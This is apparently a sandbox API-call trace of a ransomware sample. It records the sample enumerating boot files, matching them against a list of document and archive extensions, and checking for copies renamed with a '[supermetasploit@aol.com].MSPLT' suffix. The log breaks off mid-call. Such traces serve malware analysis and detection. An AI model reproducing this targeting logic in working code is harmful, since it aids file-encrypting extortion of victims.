[0285.121] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0285.121] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0285.121] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=74144) returned 1 [0285.121] CloseHandle (hObject=0x3b8) returned 1 [0285.121] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui")) returned 0x20 [0285.121] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.121] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.122] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.122] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.122] lstrlenW (lpString=".doc") returned 4 [0285.122] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.122] lstrlenW (lpString=".docx") returned 5 [0285.122] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.122] lstrlenW (lpString=".pdf") returned 4 [0285.122] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.122] lstrlenW (lpString=".xls") returned 4 [0285.122] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.122] lstrlenW (lpString=".xlsx") returned 5 [0285.122] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.122] lstrlenW (lpString=".ppt") returned 4 [0285.122] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.122] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.122] lstrlenW (lpString=".zip") returned 4 [0285.122] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.122] lstrlenW (lpString=".rar") returned 4 [0285.122] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.122] lstrlenW (lpString=".bz2") returned 4 [0285.122] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.122] lstrlenW (lpString=".7z") returned 3 [0285.122] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.123] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.123] lstrlenW (lpString=".dbf") returned 4 [0285.123] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.123] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.123] lstrlenW (lpString=".1cd") returned 4 [0285.123] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.123] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.123] lstrlenW (lpString=".jpg") returned 4 [0285.123] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.123] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.123] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.123] lstrlenW (lpString=".doc") returned 4 [0285.123] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.123] lstrlenW (lpString=".docx") returned 5 [0285.123] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.123] lstrlenW (lpString=".pdf") returned 4 [0285.123] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.123] lstrlenW (lpString=".xls") returned 4 [0285.123] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.123] lstrlenW (lpString=".xlsx") returned 5 [0285.123] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.123] lstrlenW (lpString=".ppt") returned 4 [0285.123] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.123] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.123] lstrlenW (lpString=".zip") returned 4 [0285.123] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.124] lstrlenW (lpString=".rar") returned 4 [0285.124] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.124] lstrlenW (lpString=".bz2") returned 4 [0285.124] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.124] lstrlenW (lpString=".7z") returned 3 [0285.124] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.124] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.124] lstrlenW (lpString=".dbf") returned 4 [0285.124] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.124] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.124] lstrlenW (lpString=".1cd") returned 4 [0285.124] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.124] lstrlenW (lpString="C:\\Boot\\en-US\\bootmgr.exe.mui") returned 29 [0285.124] lstrlenW (lpString=".jpg") returned 4 [0285.124] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.124] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0285.124] lstrlenW (lpString="memtest.exe.mui") returned 15 [0285.124] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0285.125] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=44960) returned 1 [0285.125] CloseHandle (hObject=0x3b8) returned 1 [0285.125] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0285.125] GetFileAttributesW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0285.125] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0285.125] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.125] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.125] lstrlenW (lpString=".doc") returned 4 [0285.125] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.126] lstrlenW (lpString=".docx") returned 5 [0285.126] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.126] lstrlenW (lpString=".pdf") returned 4 [0285.126] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.126] lstrlenW (lpString=".xls") returned 4 [0285.126] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.126] lstrlenW (lpString=".xlsx") returned 5 [0285.126] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.126] lstrlenW (lpString=".ppt") returned 4 [0285.126] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.126] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.126] lstrlenW (lpString=".zip") returned 4 [0285.126] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.126] lstrlenW (lpString=".rar") returned 4 [0285.126] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.126] lstrlenW (lpString=".bz2") returned 4 [0285.126] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.126] lstrlenW (lpString=".7z") returned 3 [0285.126] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.126] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.126] lstrlenW (lpString=".dbf") returned 4 [0285.126] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.126] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.126] lstrlenW (lpString=".1cd") returned 4 [0285.126] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.126] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.126] lstrlenW (lpString=".jpg") returned 4 [0285.126] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.127] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.127] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.127] lstrlenW (lpString=".doc") returned 4 [0285.127] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.127] lstrlenW (lpString=".docx") returned 5 [0285.127] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.127] lstrlenW (lpString=".pdf") returned 4 [0285.127] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.127] lstrlenW (lpString=".xls") returned 4 [0285.127] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.127] lstrlenW (lpString=".xlsx") returned 5 [0285.127] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.127] lstrlenW (lpString=".ppt") returned 4 [0285.127] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.127] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.127] lstrlenW (lpString=".zip") returned 4 [0285.127] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.127] lstrlenW (lpString=".rar") returned 4 [0285.127] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.127] lstrlenW (lpString=".bz2") returned 4 [0285.127] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.127] lstrlenW (lpString=".7z") returned 3 [0285.127] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.127] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.128] lstrlenW (lpString=".dbf") returned 4 [0285.128] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.128] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.128] lstrlenW (lpString=".1cd") returned 4 [0285.128] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.128] lstrlenW (lpString="C:\\Boot\\en-US\\memtest.exe.mui") returned 29 [0285.128] lstrlenW (lpString=".jpg") returned 4 [0285.128] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.128] Sleep (dwMilliseconds=0x64) [0285.426] Sleep (dwMilliseconds=0x64) [0285.784] Sleep (dwMilliseconds=0x64) [0286.064] Sleep (dwMilliseconds=0x64) [0286.300] Sleep (dwMilliseconds=0x64) [0286.524] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.524] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.524] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.524] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=63840) returned 1 [0286.524] CloseHandle (hObject=0x348) returned 1 [0286.524] GetFileAttributesW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui")) returned 0x20 [0286.524] GetFileAttributesW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.524] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.525] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.525] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.525] lstrlenW (lpString=".doc") returned 4 [0286.525] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.525] lstrlenW (lpString=".docx") returned 5 [0286.525] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.525] lstrlenW (lpString=".pdf") returned 4 [0286.525] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.525] lstrlenW (lpString=".xls") returned 4 [0286.525] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.525] lstrlenW (lpString=".xlsx") returned 5 [0286.525] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.525] lstrlenW (lpString=".ppt") returned 4 [0286.525] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.525] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.525] lstrlenW (lpString=".zip") returned 4 [0286.525] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.525] lstrlenW (lpString=".rar") returned 4 [0286.525] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.525] lstrlenW (lpString=".bz2") returned 4 [0286.525] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.525] lstrlenW (lpString=".7z") returned 3 [0286.525] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.525] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.526] lstrlenW (lpString=".dbf") returned 4 [0286.526] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.526] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.526] lstrlenW (lpString=".1cd") returned 4 [0286.526] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.526] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.526] lstrlenW (lpString=".jpg") returned 4 [0286.526] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.526] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.526] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.526] lstrlenW (lpString=".doc") returned 4 [0286.526] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.526] lstrlenW (lpString=".docx") returned 5 [0286.526] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.526] lstrlenW (lpString=".pdf") returned 4 [0286.526] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.526] lstrlenW (lpString=".xls") returned 4 [0286.526] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.526] lstrlenW (lpString=".xlsx") returned 5 [0286.526] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.526] lstrlenW (lpString=".ppt") returned 4 [0286.526] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.526] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.526] lstrlenW (lpString=".zip") returned 4 [0286.526] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.527] lstrlenW (lpString=".rar") returned 4 [0286.527] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.527] lstrlenW (lpString=".bz2") returned 4 [0286.527] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.527] lstrlenW (lpString=".7z") returned 3 [0286.527] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.527] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.527] lstrlenW (lpString=".dbf") returned 4 [0286.527] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.527] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.527] lstrlenW (lpString=".1cd") returned 4 [0286.527] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.527] lstrlenW (lpString="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 29 [0286.527] lstrlenW (lpString=".jpg") returned 4 [0286.527] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.527] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0286.527] lstrlenW (lpString="memtest.exe.mui") returned 15 [0286.527] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0286.528] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=42392) returned 1 [0286.528] CloseHandle (hObject=0x348) returned 1 [0286.528] GetFileAttributesW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui")) returned 0x20 [0286.528] GetFileAttributesW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.528] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\memtest.exe.mui" (normalized: "c:\\boot\\zh-tw\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.528] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.528] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.528] lstrlenW (lpString=".doc") returned 4 [0286.528] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.528] lstrlenW (lpString=".docx") returned 5 [0286.528] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.529] lstrlenW (lpString=".pdf") returned 4 [0286.529] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.529] lstrlenW (lpString=".xls") returned 4 [0286.529] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.529] lstrlenW (lpString=".xlsx") returned 5 [0286.529] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.529] lstrlenW (lpString=".ppt") returned 4 [0286.529] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.529] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.529] lstrlenW (lpString=".zip") returned 4 [0286.529] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.529] lstrlenW (lpString=".rar") returned 4 [0286.529] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.529] lstrlenW (lpString=".bz2") returned 4 [0286.529] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.529] lstrlenW (lpString=".7z") returned 3 [0286.529] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.529] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.529] lstrlenW (lpString=".dbf") returned 4 [0286.529] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.529] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.529] lstrlenW (lpString=".1cd") returned 4 [0286.529] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.529] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.529] lstrlenW (lpString=".jpg") returned 4 [0286.529] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.530] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.530] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.530] lstrlenW (lpString=".doc") returned 4 [0286.530] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.530] lstrlenW (lpString=".docx") returned 5 [0286.530] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.530] lstrlenW (lpString=".pdf") returned 4 [0286.530] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.530] lstrlenW (lpString=".xls") returned 4 [0286.530] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0286.530] lstrlenW (lpString=".xlsx") returned 5 [0286.530] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0286.530] lstrlenW (lpString=".ppt") returned 4 [0286.530] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.530] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.530] lstrlenW (lpString=".zip") returned 4 [0286.530] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0286.530] lstrlenW (lpString=".rar") returned 4 [0286.530] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.530] lstrlenW (lpString=".bz2") returned 4 [0286.530] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.530] lstrlenW (lpString=".7z") returned 3 [0286.530] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.530] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.530] lstrlenW (lpString=".dbf") returned 4 [0286.531] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.531] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.531] lstrlenW (lpString=".1cd") returned 4 [0286.531] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.531] lstrlenW (lpString="C:\\Boot\\zh-TW\\memtest.exe.mui") returned 29 [0286.531] lstrlenW (lpString=".jpg") returned 4 [0286.531] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0286.531] lstrlenW (lpString="bootmgr") returned 7 [0286.531] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0286.542] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=395226) returned 1 [0286.542] CloseHandle (hObject=0x320) returned 1 [0286.542] GetFileAttributesW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr")) returned 0x27 [0286.543] GetFileAttributesW (lpFileName="C:\\bootmgr.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\bootmgr.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.543] SetFileAttributesW (lpFileName="C:\\bootmgr", dwFileAttributes=0x26) returned 0 [0286.573] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.573] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.574] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.574] lstrlenW (lpString=".doc") returned 4 [0286.574] lstrcmpiW (lpString1=".doc", lpString2="tmgr") returned -1 [0286.574] lstrlenW (lpString=".docx") returned 5 [0286.574] lstrcmpiW (lpString1=".docx", lpString2="otmgr") returned -1 [0286.574] lstrlenW (lpString=".pdf") returned 4 [0286.574] lstrcmpiW (lpString1=".pdf", lpString2="tmgr") returned -1 [0286.574] lstrlenW (lpString=".xls") returned 4 [0286.574] lstrcmpiW (lpString1=".xls", lpString2="tmgr") returned -1 [0286.574] lstrlenW (lpString=".xlsx") returned 5 [0286.574] lstrcmpiW (lpString1=".xlsx", lpString2="otmgr") returned -1 [0286.574] lstrlenW (lpString=".ppt") returned 4 [0286.574] lstrcmpiW (lpString1=".ppt", lpString2="tmgr") returned -1 [0286.574] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.574] lstrlenW (lpString=".zip") returned 4 [0286.574] lstrcmpiW (lpString1=".zip", lpString2="tmgr") returned -1 [0286.574] lstrlenW (lpString=".rar") returned 4 [0286.574] lstrcmpiW (lpString1=".rar", lpString2="tmgr") returned -1 [0286.574] lstrlenW (lpString=".bz2") returned 4 [0286.574] lstrcmpiW (lpString1=".bz2", lpString2="tmgr") returned -1 [0286.574] lstrlenW (lpString=".7z") returned 3 [0286.574] lstrcmpiW (lpString1=".7z", lpString2="mgr") returned -1 [0286.574] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.574] lstrlenW (lpString=".dbf") returned 4 [0286.574] lstrcmpiW (lpString1=".dbf", lpString2="tmgr") returned -1 [0286.574] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.574] lstrlenW (lpString=".1cd") returned 4 [0286.574] lstrcmpiW (lpString1=".1cd", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.575] lstrlenW (lpString=".jpg") returned 4 [0286.575] lstrcmpiW (lpString1=".jpg", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.575] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.575] lstrlenW (lpString=".doc") returned 4 [0286.575] lstrcmpiW (lpString1=".doc", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString=".docx") returned 5 [0286.575] lstrcmpiW (lpString1=".docx", lpString2="otmgr") returned -1 [0286.575] lstrlenW (lpString=".pdf") returned 4 [0286.575] lstrcmpiW (lpString1=".pdf", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString=".xls") returned 4 [0286.575] lstrcmpiW (lpString1=".xls", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString=".xlsx") returned 5 [0286.575] lstrcmpiW (lpString1=".xlsx", lpString2="otmgr") returned -1 [0286.575] lstrlenW (lpString=".ppt") returned 4 [0286.575] lstrcmpiW (lpString1=".ppt", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.575] lstrlenW (lpString=".zip") returned 4 [0286.575] lstrcmpiW (lpString1=".zip", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString=".rar") returned 4 [0286.575] lstrcmpiW (lpString1=".rar", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString=".bz2") returned 4 [0286.575] lstrcmpiW (lpString1=".bz2", lpString2="tmgr") returned -1 [0286.575] lstrlenW (lpString=".7z") returned 3 [0286.575] lstrcmpiW (lpString1=".7z", lpString2="mgr") returned -1 [0286.576] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.576] lstrlenW (lpString=".dbf") returned 4 [0286.576] lstrcmpiW (lpString1=".dbf", lpString2="tmgr") returned -1 [0286.576] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.576] lstrlenW (lpString=".1cd") returned 4 [0286.576] lstrcmpiW (lpString1=".1cd", lpString2="tmgr") returned -1 [0286.576] lstrlenW (lpString="C:\\bootmgr") returned 10 [0286.576] lstrlenW (lpString=".jpg") returned 4 [0286.576] lstrcmpiW (lpString1=".jpg", lpString2="tmgr") returned -1 [0286.576] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0286.576] lstrlenW (lpString="Internet Explorer.evtx") returned 22 [0286.576] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0x80000000, 